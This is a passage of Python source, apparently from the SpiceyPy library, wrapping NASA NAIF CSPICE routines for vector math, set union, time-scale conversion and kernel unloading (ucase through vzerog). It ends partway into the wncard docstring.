@spiceErrorCheck
def ucase(inchar, lenout=None):
    """
    Convert the characters in a string to uppercase.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ucase_c.html
    :param inchar: Input string.
    :type inchar: str
    :param lenout: Optional Maximum length of output string.
    :type lenout: int
    :return: Output string, all uppercase.
    :rtype: str
    """
    # Default output size: input length plus room for the terminator.
    if lenout is None:
        lenout = len(inchar) + 1
    outchar = stypes.stringToCharP(" " * lenout)
    libspice.ucase_c(stypes.stringToCharP(inchar), ctypes.c_int(lenout),
                     outchar)
    return stypes.toPythonString(outchar)
@spiceErrorCheck
def ucrss(v1, v2):
    """
    Compute the normalized cross product of two 3-vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ucrss_c.html
    :param v1: Left vector for cross product.
    :type v1: 3-Element Array of floats
    :param v2: Right vector for cross product.
    :type v2: 3-Element Array of floats
    :return: Normalized cross product v1xv2 / abs(v1xv2).
    :rtype: Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.ucrss_c(stypes.toDoubleVector(v1), stypes.toDoubleVector(v2),
                     vout)
    return stypes.cVectorToPython(vout)
def uddc(udfunc, x, dx):
    """
    SPICE private routine intended solely for the support of SPICE
    routines. Users should not call this routine directly due to the
    volatile nature of this routine.
    This routine calculates the derivative of 'udfunc' with respect
    to time for 'et', then determines if the derivative has a
    negative value.
    Use the @spiceypy.utils.callbacks.SpiceUDFUNS decorator to wrap
    a given python function that takes one parameter (float) and
    returns a float. For example::
        @spiceypy.utils.callbacks.SpiceUDFUNS
        def udfunc(et_in):
            pos, new_et = spice.spkpos("MERCURY", et_in, "J2000", "LT+S", "MOON")
            return new_et
        is_negative = spice.uddc(udfunc, et, 1.0)
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/uddc_c.html
    :param udfunc: Name of the routine that computes the scalar value of interest.
    :type udfunc: ctypes.CFunctionType
    :param x: Independent variable of 'udfunc'.
    :type x: float
    :param dx: Interval from 'x' for derivative calculation.
    :type dx: float
    :return: Boolean indicating if the derivative is negative.
    :rtype: bool
    """
    # CSPICE reports the result via an output int flag.
    isdescr = ctypes.c_int()
    libspice.uddc_c(udfunc, ctypes.c_double(x), ctypes.c_double(dx),
                    ctypes.byref(isdescr))
    return bool(isdescr.value)
@spiceErrorCheck
def uddf(udfunc, x, dx):
    """
    Routine to calculate the first derivative of a caller-specified
    function using a three-point estimation.
    Use the @spiceypy.utils.callbacks.SpiceUDFUNS decorator to wrap
    a given python function that takes one parameter (float) and
    returns a float. For example::
        @spiceypy.utils.callbacks.SpiceUDFUNS
        def udfunc(et_in):
            pos, new_et = spice.spkpos("MERCURY", et_in, "J2000", "LT+S", "MOON")
            return new_et
        deriv = spice.uddf(udfunc, et, 1.0)
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/uddf_c.html
    :param udfunc: Name of the routine that computes the scalar value of interest.
    :type udfunc: ctypes.CFunctionType
    :param x: Independent variable of 'udfunc'.
    :type x: float
    :param dx: Interval from 'x' for derivative calculation.
    :type dx: float
    :return: Approximate derivative of 'udfunc' at 'x'
    :rtype: float
    """
    deriv = ctypes.c_double()
    libspice.uddf_c(udfunc, ctypes.c_double(x), ctypes.c_double(dx),
                    ctypes.byref(deriv))
    return deriv.value
def udf(x):
    """
    No-op routine with an argument signature matching udfuns.
    Always returns 0.0 .
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/udf_c.html
    :param x: Double precision value, unused.
    :type x: float
    :return: Double precision value, unused.
    :rtype: float
    """
    value = ctypes.c_double()
    libspice.udf_c(ctypes.c_double(x), ctypes.byref(value))
    return value.value
@spiceErrorCheck
def union(a, b):
    """
    Compute the union of two sets of any data type to form a third set.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/union_c.html
    :param a: First input set.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param b: Second input set.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: Union of a and b.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == b.dtype
    # Compare dtype with '==', not 'is': identity comparison against int
    # literals only works by accident of CPython's small-int caching and
    # triggers a SyntaxWarning on Python >= 3.8.
    # dtype 0 = character cell, 1 = double cell, 2 = integer cell.
    if a.dtype == 0:
        c = stypes.SPICECHAR_CELL(max(a.size, b.size), max(a.length, b.length))
    elif a.dtype == 1:
        c = stypes.SPICEDOUBLE_CELL(max(a.size, b.size))
    elif a.dtype == 2:
        c = stypes.SPICEINT_CELL(max(a.size, b.size))
    else:
        raise NotImplementedError
    libspice.union_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
    return c
@spiceErrorCheck
def unitim(epoch, insys, outsys):
    """
    Transform time from one uniform scale to another. The uniform
    time scales are TAI, TDT, TDB, ET, JED, JDTDB, JDTDT.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/unitim_c.html
    :param epoch: An epoch to be converted.
    :type epoch: float
    :param insys: The time scale associated with the input epoch.
    :type insys: str
    :param outsys: The time scale associated with the function value.
    :type outsys: str
    :return:
            The float in outsys that is equivalent
            to the epoch on the insys time scale.
    :rtype: float
    """
    return libspice.unitim_c(ctypes.c_double(epoch),
                             stypes.stringToCharP(insys),
                             stypes.stringToCharP(outsys))
@spiceErrorCheck
def unload(filename):
    """
    Unload a SPICE kernel.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/unload_c.html
    :param filename: The name of a kernel to unload.
    :type filename: str
    """
    # Convenience: accept a list of kernel names and unload each in turn.
    names = filename if isinstance(filename, list) else [filename]
    for name in names:
        libspice.unload_c(stypes.stringToCharP(name))
@spiceErrorCheck
def unorm(v1):
    """
    Normalize a double precision 3-vector and return its magnitude.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/unorm_c.html
    :param v1: Vector to be normalized.
    :type v1: 3-Element Array of floats
    :return: Unit vector of v1, Magnitude of v1.
    :rtype: tuple
    """
    vout = stypes.emptyDoubleVector(3)
    vmag = ctypes.c_double()
    libspice.unorm_c(stypes.toDoubleVector(v1), vout, ctypes.byref(vmag))
    return stypes.cVectorToPython(vout), vmag.value
@spiceErrorCheck
def unormg(v1, ndim):
    """
    Normalize a double precision vector of arbitrary dimension and
    return its magnitude.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/unormg_c.html
    :param v1: Vector to be normalized.
    :type v1: Array of floats
    :param ndim: This is the dimension of v1 and vout.
    :type ndim: int
    :return: Unit vector of v1, Magnitude of v1.
    :rtype: tuple
    """
    vout = stypes.emptyDoubleVector(ndim)
    vmag = ctypes.c_double()
    libspice.unormg_c(stypes.toDoubleVector(v1), ctypes.c_int(ndim), vout,
                      ctypes.byref(vmag))
    return stypes.cVectorToPython(vout), vmag.value
@spiceErrorCheck
def utc2et(utcstr):
    """
    Convert an input time from Calendar or Julian Date format, UTC,
    to ephemeris seconds past J2000.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/utc2et_c.html
    :param utcstr: Input time string, UTC.
    :type utcstr: str
    :return: Output epoch, ephemeris seconds past J2000.
    :rtype: float
    """
    et = ctypes.c_double()
    libspice.utc2et_c(stypes.stringToCharP(utcstr), ctypes.byref(et))
    return et.value
################################################################################
# V
@spiceErrorCheck
def vadd(v1, v2):
    """ Add two 3 dimensional vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vadd_c.html
    :param v1: First vector to be added.
    :type v1: 3-Element Array of floats
    :param v2: Second vector to be added.
    :type v2: 3-Element Array of floats
    :return: v1+v2
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vadd_c(stypes.toDoubleVector(v1), stypes.toDoubleVector(v2),
                    vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vaddg(v1, v2, ndim):
    """ Add two n-dimensional vectors
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vaddg_c.html
    :param v1: First vector to be added.
    :type v1: list[ndim]
    :param v2: Second vector to be added.
    :type v2: list[ndim]
    :param ndim: Dimension of v1 and v2.
    :type ndim: int
    :return: v1+v2
    :rtype: list[ndim]
    """
    vout = stypes.emptyDoubleVector(ndim)
    libspice.vaddg_c(stypes.toDoubleVector(v1), stypes.toDoubleVector(v2),
                     ctypes.c_int(ndim), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def valid(insize, n, inset):
    """
    Create a valid CSPICE set from a CSPICE Cell of any data type.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/valid_c.html
    :param insize: Size (maximum cardinality) of the set.
    :type insize: int
    :param n: Initial no. of (possibly non-distinct) elements.
    :type n: int
    :param inset: Set to be validated.
    :type inset: spiceypy.utils.support_types.SpiceCell
    :return: validated set
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(inset, stypes.SpiceCell)
    # The cell is validated in place; return it for caller convenience.
    libspice.valid_c(ctypes.c_int(insize), ctypes.c_int(n), inset)
    return inset
@spiceErrorCheck
def vcrss(v1, v2):
    """
    Compute the cross product of two 3-dimensional vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vcrss_c.html
    :param v1: Left hand vector for cross product.
    :type v1: 3-Element Array of floats
    :param v2: Right hand vector for cross product.
    :type v2: 3-Element Array of floats
    :return: Cross product v1 x v2.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vcrss_c(stypes.toDoubleVector(v1), stypes.toDoubleVector(v2),
                     vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vdist(v1, v2):
    """
    Return the distance between two three-dimensional vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vdist_c.html
    :param v1: First vector in the dot product.
    :type v1: 3-Element Array of floats
    :param v2: Second vector in the dot product.
    :type v2: 3-Element Array of floats
    :return: the distance between v1 and v2
    :rtype: float
    """
    return libspice.vdist_c(stypes.toDoubleVector(v1),
                            stypes.toDoubleVector(v2))
@spiceErrorCheck
def vdistg(v1, v2, ndim):
    """
    Return the distance between two vectors of arbitrary dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vdistg_c.html
    :param v1: ndim-dimensional double precision vector.
    :type v1: list[ndim]
    :param v2: ndim-dimensional double precision vector.
    :type v2: list[ndim]
    :param ndim: Dimension of v1 and v2.
    :type ndim: int
    :return: the distance between v1 and v2
    :rtype: float
    """
    return libspice.vdistg_c(stypes.toDoubleVector(v1),
                             stypes.toDoubleVector(v2),
                             ctypes.c_int(ndim))
@spiceErrorCheck
def vdot(v1, v2):
    """
    Compute the dot product of two double precision, 3-dimensional vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vdot_c.html
    :param v1: First vector in the dot product.
    :type v1: 3-Element Array of floats
    :param v2: Second vector in the dot product.
    :type v2: 3-Element Array of floats
    :return: dot product of v1 and v2.
    :rtype: float
    """
    return libspice.vdot_c(stypes.toDoubleVector(v1),
                           stypes.toDoubleVector(v2))
@spiceErrorCheck
def vdotg(v1, v2, ndim):
    """
    Compute the dot product of two double precision vectors of
    arbitrary dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vdotg_c.html
    :param v1: First vector in the dot product.
    :type v1: list[ndim]
    :param v2: Second vector in the dot product.
    :type v2: list[ndim]
    :param ndim: Dimension of v1 and v2.
    :type ndim: int
    :return: dot product of v1 and v2.
    :rtype: float
    """
    return libspice.vdotg_c(stypes.toDoubleVector(v1),
                            stypes.toDoubleVector(v2),
                            ctypes.c_int(ndim))
@spiceErrorCheck
def vequ(v1):
    """
    Make one double precision 3-dimensional vector equal to another.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vequ_c.html
    :param v1: 3-dimensional double precision vector.
    :type v1: 3-Element Array of floats
    :return: 3-dimensional double precision vector set equal to vin.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vequ_c(stypes.toDoubleVector(v1), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vequg(v1, ndim):
    """
    Make one double precision vector of arbitrary dimension equal to another.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vequg_c.html
    :param v1: ndim-dimensional double precision vector.
    :type v1: list[ndim]
    :param ndim: Dimension of vin (and also vout).
    :type ndim: int
    :return: ndim-dimensional double precision vector set equal to vin.
    :rtype: list[ndim]
    """
    vout = stypes.emptyDoubleVector(ndim)
    libspice.vequg_c(stypes.toDoubleVector(v1), ctypes.c_int(ndim), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vhat(v1):
    """
    Find the unit vector along a double precision 3-dimensional vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vhat_c.html
    :param v1: Vector to be unitized.
    :type v1: 3-Element Array of floats
    :return: Unit vector v / abs(v).
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vhat_c(stypes.toDoubleVector(v1), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vhatg(v1, ndim):
    """
    Find the unit vector along a double precision vector of arbitrary dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vhatg_c.html
    :param v1: Vector to be normalized.
    :type v1: list[ndim]
    :param ndim: Dimension of v1 (and also vout).
    :type ndim: int
    :return: Unit vector v / abs(v).
    :rtype: list[ndim]
    """
    vout = stypes.emptyDoubleVector(ndim)
    libspice.vhatg_c(stypes.toDoubleVector(v1), ctypes.c_int(ndim), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vlcom(a, v1, b, v2):
    """
    Compute a vector linear combination of two double precision,
    3-dimensional vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vlcom_c.html
    :param a: Coefficient of v1
    :type a: float
    :param v1: Vector in 3-space
    :type v1: 3-Element Array of floats
    :param b: Coefficient of v2
    :type b: float
    :param v2: Vector in 3-space
    :type v2: 3-Element Array of floats
    :return: Linear Vector Combination a*v1 + b*v2.
    :rtype: 3-Element Array of floats
    """
    sumv = stypes.emptyDoubleVector(3)
    libspice.vlcom_c(ctypes.c_double(a), stypes.toDoubleVector(v1),
                     ctypes.c_double(b), stypes.toDoubleVector(v2), sumv)
    return stypes.cVectorToPython(sumv)
@spiceErrorCheck
def vlcom3(a, v1, b, v2, c, v3):
    """
    This subroutine computes the vector linear combination
    a*v1 + b*v2 + c*v3 of double precision, 3-dimensional vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vlcom3_c.html
    :param a: Coefficient of v1
    :type a: float
    :param v1: Vector in 3-space
    :type v1: 3-Element Array of floats
    :param b: Coefficient of v2
    :type b: float
    :param v2: Vector in 3-space
    :type v2: 3-Element Array of floats
    :param c: Coefficient of v3
    :type c: float
    :param v3: Vector in 3-space
    :type v3: 3-Element Array of floats
    :return: Linear Vector Combination a*v1 + b*v2 + c*v3
    :rtype: 3-Element Array of floats
    """
    sumv = stypes.emptyDoubleVector(3)
    libspice.vlcom3_c(ctypes.c_double(a), stypes.toDoubleVector(v1),
                      ctypes.c_double(b), stypes.toDoubleVector(v2),
                      ctypes.c_double(c), stypes.toDoubleVector(v3), sumv)
    return stypes.cVectorToPython(sumv)
@spiceErrorCheck
def vlcomg(n, a, v1, b, v2):
    """
    Compute a vector linear combination of two double precision
    vectors of arbitrary dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vlcomg_c.html
    :param n: Dimension of vector space
    :type n: int
    :param a: Coefficient of v1
    :type a: float
    :param v1: Vector in n-space
    :type v1: list[n]
    :param b: Coefficient of v2
    :type b: float
    :param v2: Vector in n-space
    :type v2: list[n]
    :return: Linear Vector Combination a*v1 + b*v2
    :rtype: list[n]
    """
    sumv = stypes.emptyDoubleVector(n)
    libspice.vlcomg_c(ctypes.c_int(n), ctypes.c_double(a),
                      stypes.toDoubleVector(v1), ctypes.c_double(b),
                      stypes.toDoubleVector(v2), sumv)
    return stypes.cVectorToPython(sumv)
@spiceErrorCheck
def vminug(vin, ndim):
    """
    Negate a double precision vector of arbitrary dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vminug_c.html
    :param vin: ndim-dimensional double precision vector to be negated.
    :type vin: Array of floats
    :param ndim: Dimension of vin.
    :type ndim: int
    :return: ndim-dimensional double precision vector equal to -vin.
    :rtype: list[ndim]
    """
    vout = stypes.emptyDoubleVector(ndim)
    libspice.vminug_c(stypes.toDoubleVector(vin), ctypes.c_int(ndim), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vminus(vin):
    """
    Negate a double precision 3-dimensional vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vminus_c.html
    :param vin: Vector to be negated.
    :type vin: 3-Element Array of floats
    :return: Negated vector -v1.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vminus_c(stypes.toDoubleVector(vin), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vnorm(v):
    """
    Compute the magnitude of a double precision, 3-dimensional vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vnorm_c.html
    :param v: Vector whose magnitude is to be found.
    :type v: 3-Element Array of floats
    :return: magnitude of v calculated in a numerically stable way
    :rtype: float
    """
    return libspice.vnorm_c(stypes.toDoubleVector(v))
@spiceErrorCheck
def vnormg(v, ndim):
    """
    Compute the magnitude of a double precision vector of arbitrary dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vnormg_c.html
    :param v: Vector whose magnitude is to be found.
    :type v: Array of floats
    :param ndim: Dimension of v
    :type ndim: int
    :return: magnitude of v calculated in a numerically stable way
    :rtype: float
    """
    return libspice.vnormg_c(stypes.toDoubleVector(v), ctypes.c_int(ndim))
@spiceErrorCheck
def vpack(x, y, z):
    """
    Pack three scalar components into a vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vpack_c.html
    :param x: first scalar component
    :type x: float
    :param y: second scalar component
    :type y: float
    :param z: third scalar component
    :type z: float
    :return: Equivalent 3-vector.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vpack_c(ctypes.c_double(x), ctypes.c_double(y),
                     ctypes.c_double(z), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vperp(a, b):
    """
    Find the component of a vector that is perpendicular to a second
    vector. All vectors are 3-dimensional.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vperp_c.html
    :param a: The vector whose orthogonal component is sought.
    :type a: 3-Element Array of floats
    :param b: The vector used as the orthogonal reference.
    :type b: 3-Element Array of floats
    :return: The component of a orthogonal to b.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vperp_c(stypes.toDoubleVector(a), stypes.toDoubleVector(b),
                     vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vprjp(vin, plane):
    """
    Project a vector onto a specified plane, orthogonally.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vprjp_c.html
    :param vin: The projected vector.
    :type vin: 3-Element Array of floats
    :param plane: Plane containing vin.
    :type plane: spiceypy.utils.support_types.Plane
    :return: Vector resulting from projection.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    # The plane struct is passed by reference, unmodified.
    libspice.vprjp_c(stypes.toDoubleVector(vin), ctypes.byref(plane), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
@spiceFoundExceptionThrower
def vprjpi(vin, projpl, invpl):
    """
    Find the vector in a specified plane that maps to a specified
    vector in another plane under orthogonal projection.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vprjpi_c.html
    :param vin: The projected vector.
    :type vin: 3-Element Array of floats
    :param projpl: Plane containing vin.
    :type projpl: spiceypy.utils.support_types.Plane
    :param invpl: Plane containing inverse image of vin.
    :type invpl: spiceypy.utils.support_types.Plane
    :return: Inverse projection of vin.
    :rtype: list
    """
    vout = stypes.emptyDoubleVector(3)
    found = ctypes.c_int()
    # The found flag is consumed by @spiceFoundExceptionThrower, which
    # raises when the inverse image does not exist.
    libspice.vprjpi_c(stypes.toDoubleVector(vin), ctypes.byref(projpl),
                      ctypes.byref(invpl), vout, ctypes.byref(found))
    return stypes.cVectorToPython(vout), bool(found.value)
@spiceErrorCheck
def vproj(a, b):
    """
    Find the projection of one vector onto another vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vproj_c.html
    :param a: The vector to be projected.
    :type a: 3-Element Array of floats
    :param b: The vector onto which a is to be projected.
    :type b: 3-Element Array of floats
    :return: The projection of a onto b.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vproj_c(stypes.toDoubleVector(a), stypes.toDoubleVector(b),
                     vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vrel(v1, v2):
    """
    Return the relative difference between two 3-dimensional vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vrel_c.html
    :param v1: First vector
    :type v1: 3-Element Array of floats
    :param v2: Second vector
    :type v2: 3-Element Array of floats
    :return: the relative difference between v1 and v2.
    :rtype: float
    """
    return libspice.vrel_c(stypes.toDoubleVector(v1),
                           stypes.toDoubleVector(v2))
@spiceErrorCheck
def vrelg(v1, v2, ndim):
    """
    Return the relative difference between two vectors of general dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vrelg_c.html
    :param v1: First vector
    :type v1: Array of floats
    :param v2: Second vector
    :type v2: Array of floats
    :param ndim: Dimension of v1 and v2.
    :type ndim: int
    :return: the relative difference between v1 and v2.
    :rtype: float
    """
    return libspice.vrelg_c(stypes.toDoubleVector(v1),
                            stypes.toDoubleVector(v2),
                            ctypes.c_int(ndim))
@spiceErrorCheck
def vrotv(v, axis, theta):
    """
    Rotate a vector about a specified axis vector by a
    specified angle and return the rotated vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vrotv_c.html
    :param v: Vector to be rotated.
    :type v: 3-Element Array of floats
    :param axis: Axis of the rotation.
    :type axis: 3-Element Array of floats
    :param theta: Angle of rotation (radians).
    :type theta: float
    :return: Result of rotating v about axis by theta
    :rtype: 3-Element Array of floats
    """
    rotated = stypes.emptyDoubleVector(3)
    libspice.vrotv_c(stypes.toDoubleVector(v), stypes.toDoubleVector(axis),
                     ctypes.c_double(theta), rotated)
    return stypes.cVectorToPython(rotated)
@spiceErrorCheck
def vscl(s, v1):
    """
    Multiply a scalar and a 3-dimensional double precision vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vscl_c.html
    :param s: Scalar to multiply a vector
    :type s: float
    :param v1: Vector to be multiplied
    :type v1: 3-Element Array of floats
    :return: Product vector, s*v1.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vscl_c(ctypes.c_double(s), stypes.toDoubleVector(v1), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vsclg(s, v1, ndim):
    """
    Multiply a scalar and a double precision vector of arbitrary dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsclg_c.html
    :param s: Scalar to multiply a vector
    :type s: float
    :param v1: Vector to be multiplied
    :type v1: Array of floats
    :param ndim: Dimension of v1
    :type ndim: int
    :return: Product vector, s*v1.
    :rtype: Array of floats
    """
    vout = stypes.emptyDoubleVector(ndim)
    libspice.vsclg_c(ctypes.c_double(s), stypes.toDoubleVector(v1),
                     ctypes.c_int(ndim), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vsep(v1, v2):
    """
    Find the separation angle in radians between two double
    precision, 3-dimensional vectors. This angle is defined as zero
    if either vector is zero.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsep_c.html
    :param v1: First vector
    :type v1: 3-Element Array of floats
    :param v2: Second vector
    :type v2: 3-Element Array of floats
    :return: separation angle in radians
    :rtype: float
    """
    return libspice.vsep_c(stypes.toDoubleVector(v1),
                           stypes.toDoubleVector(v2))
@spiceErrorCheck
def vsepg(v1, v2, ndim):
    """
    Find the separation angle in radians between two double
    precision vectors of arbitrary dimension. This angle is defined
    as zero if either vector is zero.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsepg_c.html
    :param v1: First vector
    :type v1: Array of floats
    :param v2: Second vector
    :type v2: Array of floats
    :param ndim: The number of elements in v1 and v2.
    :type ndim: int
    :return: separation angle in radians
    :rtype: float
    """
    return libspice.vsepg_c(stypes.toDoubleVector(v1),
                            stypes.toDoubleVector(v2),
                            ctypes.c_int(ndim))
@spiceErrorCheck
def vsub(v1, v2):
    """
    Compute the difference between two 3-dimensional,
    double precision vectors.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsub_c.html
    :param v1: First vector (minuend).
    :type v1: 3-Element Array of floats
    :param v2: Second vector (subtrahend).
    :type v2: 3-Element Array of floats
    :return: Difference vector, v1 - v2.
    :rtype: 3-Element Array of floats
    """
    vout = stypes.emptyDoubleVector(3)
    libspice.vsub_c(stypes.toDoubleVector(v1), stypes.toDoubleVector(v2),
                    vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vsubg(v1, v2, ndim):
    """
    Compute the difference between two double precision
    vectors of arbitrary dimension.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsubg_c.html
    :param v1: First vector (minuend).
    :type v1: Array of floats
    :param v2: Second vector (subtrahend).
    :type v2: Array of floats
    :param ndim: Dimension of v1, v2, and vout.
    :type ndim: int
    :return: Difference vector, v1 - v2.
    :rtype: Array of floats
    """
    vout = stypes.emptyDoubleVector(ndim)
    libspice.vsubg_c(stypes.toDoubleVector(v1), stypes.toDoubleVector(v2),
                     ctypes.c_int(ndim), vout)
    return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vtmv(v1, matrix, v2):
    """
    Multiply the transpose of a 3-dimensional column vector,
    a 3x3 matrix, and a 3-dimensional column vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vtmv_c.html
    :param v1: 3 dimensional double precision column vector.
    :type v1: 3-Element Array of floats
    :param matrix: 3x3 double precision matrix.
    :type matrix: 3x3-Element Array of floats
    :param v2: 3 dimensional double precision column vector.
    :type v2: 3-Element Array of floats
    :return: the result of (v1**t * matrix * v2 ).
    :rtype: float
    """
    # Convert all three operands; the result is a plain C double.
    row_vec = stypes.toDoubleVector(v1)
    mat = stypes.toDoubleMatrix(matrix)
    col_vec = stypes.toDoubleVector(v2)
    return libspice.vtmv_c(row_vec, mat, col_vec)
@spiceErrorCheck
def vtmvg(v1, matrix, v2, nrow, ncol):
    """
    Multiply the transpose of an n-dimensional column vector,
    an nxm matrix, and an m-dimensional column vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vtmvg_c.html
    :param v1: n-dimensional double precision column vector.
    :type v1: Array of floats
    :param matrix: nxm double precision matrix.
    :type matrix: NxM-Element Array of floats
    :param v2: m-dimensional double porecision column vector.
    :type v2: Array of floats
    :param nrow: Number of rows in matrix (number of rows in v1.)
    :type nrow: int
    :param ncol: Number of columns in matrix (number of rows in v2.)
    :type ncol: int
    :return: the result of (v1**t * matrix * v2 )
    :rtype: float
    """
    row_vec = stypes.toDoubleVector(v1)
    mat = stypes.toDoubleMatrix(matrix)
    col_vec = stypes.toDoubleVector(v2)
    rows = ctypes.c_int(nrow)
    cols = ctypes.c_int(ncol)
    return libspice.vtmvg_c(row_vec, mat, col_vec, rows, cols)
@spiceErrorCheck
def vupack(v):
    """
    Unpack the three scalar components of a 3-vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vupack_c.html
    :param v: Vector
    :type v: 3-Element Array of floats
    :return: (x, y, z)
    :rtype: tuple
    """
    vin = stypes.toDoubleVector(v)
    # CSPICE returns the components through three output pointers.
    comp_x = ctypes.c_double()
    comp_y = ctypes.c_double()
    comp_z = ctypes.c_double()
    libspice.vupack_c(vin, ctypes.byref(comp_x), ctypes.byref(comp_y),
                      ctypes.byref(comp_z))
    return comp_x.value, comp_y.value, comp_z.value
@spiceErrorCheck
def vzero(v):
    """
    Test whether a 3-vector is the zero vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vzero_c.html
    :param v: Vector to be tested
    :type v: 3-Element Array of floats
    :return: true if and only if v is the zero vector
    :rtype: bool
    """
    # The C routine returns a SpiceBoolean (int); coerce it to a Python bool.
    vec = stypes.toDoubleVector(v)
    return bool(libspice.vzero_c(vec))
@spiceErrorCheck
def vzerog(v, ndim):
    """
    Test whether a general-dimensional vector is the zero vector.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vzerog_c.html
    :param v: Vector to be tested
    :type v: Array of floats
    :param ndim: Dimension of v
    :type ndim: int
    :return: true if and only if v is the zero vector
    :rtype: bool
    """
    vec = stypes.toDoubleVector(v)
    dim = ctypes.c_int(ndim)
    # Coerce the C SpiceBoolean return into a Python bool.
    return bool(libspice.vzerog_c(vec, dim))
################################################################################
# W
@spiceErrorCheck
def wncard(window):
    """
    Return the cardinality (number of intervals) of a double
    precision window.
